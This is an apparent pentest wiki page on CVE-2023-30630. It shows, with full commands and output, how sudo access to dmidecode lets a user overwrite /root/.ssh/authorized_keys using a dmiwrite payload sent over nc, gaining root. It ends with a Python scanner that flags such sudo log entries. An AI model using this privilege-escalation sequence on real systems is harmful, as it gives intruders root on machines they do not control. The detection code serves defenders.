# Dmidecode - CVE-2023-30630

Dmidecode is a tool for dumping a computer's DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.

When a low-privileged user is allowed to run `dmidecode` as root (for example via `sudo`), they can abuse a <mark style="color:red;">**file write vulnerability**</mark> in the application to <mark style="color:red;">**escalate their privileges**</mark> to root.

{% hint style="info" %}

* Files newly created through `dmidecode` will be owned by `root`. If you instead write to an already existing file, its content is overwritten but its existing ownership and permissions are kept.
* You are **not** able to create directories with `dmidecode`. If you plan to privesc through `.ssh/authorized_keys`, the `.ssh` directory needs to exist already.
  * To privesc through `/root/.ssh/authorized_keys`, `PermitRootLogin` must be enabled in `/etc/ssh/sshd_config`.
* `dmidecode` writes junk bytes at the beginning of the file. They are not visible with `cat`, but you will see them with `vi/vim`. To work around this, place your SSH key on line 2 or below.
* `dmidecode` version 3.3 has a bug that makes the program segfault when the exploit is attempted; this is fixed again in version 3.4. This exploit will work on **all versions between 1.8 and 3.4, except 3.3**.
{% endhint %}

Use the tool [`dmiwrite`](https://github.com/adamreiser/dmiwrite) to build the malicious payload.

```bash
## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode

## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2

## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]

## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi 
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
	Setting checksum: memset(buf+30, 130, 1);

Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.

## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi

## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.

# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory

## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
```
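From the defender's side, the `sudo` invocation above leaves a tell-tale line in the auth log: `dmidecode` reading its table from a user-supplied file (`-d`/`--dev-mem`) and writing it with `--dump-bin` to a sensitive path. The following scanner is an added example (not part of the original write-up, `dmidecode` or `dmiwrite`) that parses sudo log lines in the standard `auth.log`/`secure` format and flags such invocations; the log lines and the list of sensitive path prefixes are constructed assumptions.

```python
import re

# Constructed sample lines in the format sudo logs to auth.log / secure (not real logs).
SAMPLE_LOG = """\
Jun 19 14:35:01 victimHost sudo:     user : TTY=pts/0 ; PWD=/home/user ; USER=root ; COMMAND=/usr/sbin/dmidecode -t system
Jun 19 14:35:24 victimHost sudo:     user : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
Jun 19 14:36:02 victimHost sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/dmidecode --dump-bin /var/tmp/dmi-backup.bin
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# Assumed list of paths where a root-owned write is a privilege-escalation primitive rather than a DMI backup.
SENSITIVE_PREFIXES = ("/root/", "/etc/", "/usr/", "/bin/", "/sbin/", "/lib", "/boot/", "/var/spool/cron")
SENSITIVE_HOME_SSH = re.compile(r"^/home/[^/]+/\.ssh/")

def _option_value(argv, i, long_name, short_name=None):
    """Value of option argv[i] in '--opt value', '-o value' or '--opt=value' form, else None."""
    a = argv[i]
    if a == long_name or (short_name and a == short_name):
        return argv[i + 1] if i + 1 < len(argv) else None
    if a.startswith(long_name + "="):
        return a.split("=", 1)[1]
    return None

def analyze_command(cmd):
    """Return the reasons a dmidecode command line looks like the CVE-2023-30630 file-write abuse."""
    argv = cmd.split()
    if not argv or not argv[0].endswith("dmidecode"):
        return []
    dev_mem = dump_bin = None
    for i in range(len(argv)):
        dev_mem = _option_value(argv, i, "--dev-mem", "-d") or dev_mem
        dump_bin = _option_value(argv, i, "--dump-bin") or dump_bin
    reasons = []
    if dump_bin and (dump_bin.startswith(SENSITIVE_PREFIXES) or SENSITIVE_HOME_SSH.match(dump_bin)):
        reasons.append(f"--dump-bin writes as root to sensitive path {dump_bin}")
    if dev_mem not in (None, "/dev/mem"):
        reasons.append(f"table read from user-supplied file {dev_mem} instead of /dev/mem")
    return reasons

def scan_sudo_log(text):
    """Return (invoking user, command, reasons) for every suspicious sudo'ed dmidecode call in the log text."""
    findings = []
    for line in text.splitlines():
        m = SUDO_RE.search(line)
        if m and (reasons := analyze_command(m["cmd"])):
            findings.append((m["user"], m["cmd"], reasons))
    return findings
```

Running `scan_sudo_log(SAMPLE_LOG)` flags only the second line, with both reasons; a plain `dmidecode -t system` or a `--dump-bin` backup to `/var/tmp` is left alone.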

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2Fk8D3ww9C5OCja1PepGHr%2FScreenshot%202023-06-19%20143524.png?alt=media&#x26;token=d253b40f-2048-42f3-be45-62bf673bafbd" alt=""><figcaption><p>Image illustrating junk at the beginning of file</p></figcaption></figure>
